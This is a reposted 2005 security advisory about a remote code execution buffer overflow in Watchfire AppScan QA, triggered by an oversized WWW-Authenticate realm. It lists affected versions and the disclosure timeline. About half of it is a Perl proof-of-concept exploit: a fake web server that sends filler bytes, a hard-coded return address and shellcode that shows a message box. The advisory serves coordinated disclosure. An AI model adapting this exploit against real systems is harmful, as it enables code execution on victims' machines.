|
|
|
|
| |
| AppScan QA is "an automated web application testing tool that provides QA personnel with security defect analysis and remediation information. Instead of manually searching for security defects, application testers trust AppScan QA to detect security defects and vulnerabilities automatically as an integrated component of enterprise development and testing processes. AppScan QA automates test script creation, modification, and maintenance to ensure reliable and repeatable testing". A vulnerability within Watchfire's AppScan allows remote attackers to cause the product to execute arbitrary code by overflowing its internal buffer used to store the HTTP response's Realm field. |
| |
Credit:
The information has been provided by Mariano Nunez Di Croce.
The original article can be found at: CYBSEC Security Advisory AppScanQA RemoteCodeExec (pdf)
|
| |
Vulnerable Systems:
* AppScan QA version 5.0.609 / Subscription 7
* AppScan QA version 5.0.134
Immune Systems:
* AppScan QA version 5.0.609 / Subscription 8
The vulnerability specifically exists in the way AppScan QA processes 401 HTTP responses. If a custom 401 response is specially crafted, containing a WWW-Authenticate header with the Realm field consisting of more than 351 characters, a buffer overflow occurs, leading to remote code execution with the privileges of the user running AppScan QA.
Vendor Response:
* 10/12/2005: Initial Vendor Contact.
* 10/18/2005: Vendor Confirmed Vulnerability.
* 11/02/2005: Vendor Releases Update.
* 12/15/2005: Advisory Public Disclosure.
Exploit:
# Watchfire AppScan QA PoC - Coded by Mariano Nu z Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to setup the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
#
# PoC developed for Windows 2000 Server SP4.
#
#!/usr/bin/perl -w
use IO::Socket::INET;
# Dissable buffering
$| = 1;
# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com" . "\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\n" . "Keep-Alive: timeout=15, max=100\r\nConnection: Close\r\n" . "Content-Type: text/html; charset=ISO-8859-1\r\n\r\n<a href='/admin'>admin</a>";
# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\"";
my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization Required</title>\r\n</head><body>\r\n<h1>Authorization Required</h1>\r\n<p>This server could not verify that you\r\nare authorized to access the document\r\nrequested. Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.</p>\r\n</body></html>";
# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);
my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb" . "\x21\x02\x59\x7c\x51\xff\xd3\xeb" . "\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c" . "\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13" . "\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69" . "\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72" . "\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61" . "\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59" . "\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72" . "\x61\x62\x6c\x65\x21\x4e";
my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail;
# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
Reuse => 1,
Listen => 1 ) || die "Could not create socket: $!\n";
print "Waiting for connections...\n";
while ($cli = $srv->accept()) {
printf "Request from %s\n", $cli->peerhost;
while (<$cli>) {
if (s/(admin)/$1/) {
# If Request is for "admin", launch the exploit
printf "Request for protected resource detected...launching exploit\n";
print $cli $resExploit;
}
else {
# Else send a normal response
print $cli $res200;
}
}
close($cli);
}
close($srv);
|
| Subject:
|
hack the hackers - muhahaha |
Date: |
18 Dec. 2005 |
| From: |
gadi |
| http://blogs.securiteam.com/index.php/archives/144 |
|
|
|
|
|
|
